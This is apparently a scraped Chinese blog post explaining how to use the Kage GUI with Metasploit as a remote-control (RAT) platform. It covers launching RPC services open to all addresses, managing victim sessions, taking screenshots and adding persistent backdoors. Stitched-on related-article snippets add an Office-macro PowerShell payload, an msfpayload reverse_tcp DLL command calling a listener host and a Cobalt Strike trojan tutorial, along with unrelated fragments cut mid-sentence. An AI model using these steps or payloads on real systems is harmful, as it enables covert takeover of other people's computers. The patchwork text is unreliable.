利用kage把msf变成可视化远控平台

项目下载
https://github.com/WayzDev/Kage/releases

这里用kali系统演示

1,先下载kage:

2,右击给予执行权限

3,启动msf

msfconsole -q -x ‘load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msfuser Pass=msfpass‘

注意:如果kage跟msf不在一个机器上,上面命令如果不带serverhost参数,则只容许127.0.0.1链接
我们也那么可以通过

msfrpcd -U msf -P msfpass -S -f

来开启msfrpc,这样开启的rpc是监听所有ip链接的.这样开启都端口是55553,要注意哦
这只是开启rpc的两种方式,都可以实现相同功能

4,登陆kage
(如果msf在外网,也是可以链接的,但是要注意一个bug
因为生成paylaod是要在远程生成的,所有kage端和msf端一定要是同类操作系统,如果kage是windows,msf在kali上,无法生成payload,路径问题导致端)

5,seesions下基本上跟远控差不多,可以直接文件管理

文件管理

屏幕截图

6,这里的msf的payload都是一次性的后门
(服务器重启会掉线)
要持久化的后门
windows下msf可以直接达到目的(自行搜素msf 持久化后门)
linux下找了下,没找到相关文章
可以自己加服务,加启动项都可以
这里找到一个配合msf linux payload的工具
https://github.com/Screetsec/Vegile
有视频教程,就不复述了

原文地址:https://www.cnblogs.com/safoie/p/10576135.html

时间: 2024-09-30 11:16:08

利用kage把msf变成可视化远控平台的相关文章

【原创】利用Office宏实现powershell payload远控

本文将演示使用Veil-Evasion生成远控所需要的payload以及监听器,然后使用MacroShop生成payload 相关的VBA代码,最后演示将VBA代码写入.doc文本文档的宏中. 环境:虚拟机_Kali          依赖:Veil-Evasion.MacroShop 0x00 安装Veil-Evasion.MacroShop (老鸟可绕过) 本例采用git 安装. 打开Veil-Evasion的github页面:https://github.com/Veil-Framewor

python+msf make windows远控

分析的一个远控,感谢wstone的指导~ 创建dll ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll python main.py import sys, os import shutil import time import ctypes import glob import multiprocessing import multiprocess

Cobalt Strike入门教程-通过exe木马实现远控

Cobalt Strike(简称CS)有很多功能,这篇文章主要介绍最基本的功能:通过exe木马实现远程控制. CS分为两部分:客户端和Team Server服务端.这两部分都依赖Java 1.8,所以运行CS程序前要安装JRE. 分享一个Cobalt Strike v3.8的试用版,可长期试用.百度网盘:https://pan.baidu.com/s/1nXq58froWt0mu3q8I4HsSQ,提取码:fdvb. 第1步:启动CS服务端 将下载的CS程序放到Kali中,执行./teamser

python之远控工具

原理:利用套字节发送命令,在服务端执行,并将执行的结果返回客户端. 在python3中发送文本使用:send()把字符串encode进行编码,接受recv()把字符串使用decode进行解码. # coding:utf-8 import socket import os # 创建套字节 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 绑定套字节(①获取主机名,②设置端口) host = socket.gethostname() po

linux vncserver 远控

在Linux上启动VNC Server(如果没安装的话那就先安装) 执行vncserver命令: [[email protected] root]# vncserver You will require a password to access your desktops. Password: ----为了不想任何人都可以任意遥控此计算机.因此当第 Verify: ---1次启动VNC server时,会要求设置网络遥控的密码. 这样后就设置了密码,再运行vncserver 记住这个1,下面会用

晚安西南-----远控房魅影二之FKQ1440-14

序言: 在本系列文章中,已详细介绍过了FKQ6407这台远控房,其实此型号的远控房已满足了之前区块井的施工,井口封井器加上一个液动4号,此型号的远控房最多控制5个对象.而本次施工的探井,至三开所需要控制的对象有9个,其中井口为双双闸板加环形的5组合,其实就是闸板中多了一副剪切,再加上双105MPa节流管汇.单压井管汇.放喷管线,那么设计上这四条直通管到管汇前都必须带一只液动平板阀,也正因为这个原因,本次所配备的远控房型号应该算是陆地上最高规格的FKQ1440-14.它拥有着豪华的配置,24只60

MFC可视化 列表控件的使用

1.应该加入头文件 #include <Atlbase.h> 2.示例 类向导给列表控件绑定变量m_list DWORD   dwExStyle=LVS_EX_FULLROWSELECT|LVS_EX_GRIDLINES|LVS_EX_HEADERDRAGDROP|LVS_EX_ONECLICKACTIVATE|LVS_EX_FLATSB; m_list.ModifyStyle(0,LVS_REPORT|LVS_SINGLESEL|LVS_SHOWSELALWAYS);m_list.SetEx

老王教你分析远控木马是怎样工作的

本 来是一个朋友给我,要我找下后门的,可是这远控太强大了,而且作者的汇编基础非常强,就没找到,倒是无巧不成书的,发现了他的隐藏技术,瞬间感觉喜欢上 了,于是写成了win32 分享下,3分钟前,主动防御会拦截,但是电脑重启后  程序可以运行,现在又测试了下,已经变成高危病毒了,无语的360啊...源码如下,各位可以根据 需要修改: [AppleScript] 纯文本查看 复制代码 ? 001 002 003 004 005 006 007 008 009 010 011 012 013 014 0

利用 t-SNE 高维数据的可视化

利用 t-SNE 高维数据的可视化  具体软件和教程见: http://lvdmaaten.github.io/tsne/  简要介绍下用法: % Load data load ’mnist_train.mat’ ind = randperm(size(train_X, 1)); train_X = train_X(ind(1:5000),:); train_labels = train_labels(ind(1:5000)); % Set parameters no_dims = 2; ini